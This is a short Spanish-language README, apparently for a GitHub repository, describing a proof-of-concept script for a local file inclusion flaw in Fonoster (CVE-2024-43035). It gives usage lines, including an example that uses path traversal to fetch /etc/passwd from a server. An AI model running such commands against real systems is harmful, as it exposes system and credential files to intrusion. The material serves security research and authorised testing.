
Exploit de prueba de concepto para la vulnerabilidad LFI de Fonoster (CVE-2024-43035)
Este repositorio contiene un script de Prueba de Concepto (PoC) que demuestra una vulnerabilidad de Inclusión de Archivos Locales en Fonoster. Esta herramienta es solo para fines educativos y pruebas autorizadas.
Para recuperar un archivo local del servidor:
python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>
Ejemplo:
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"
z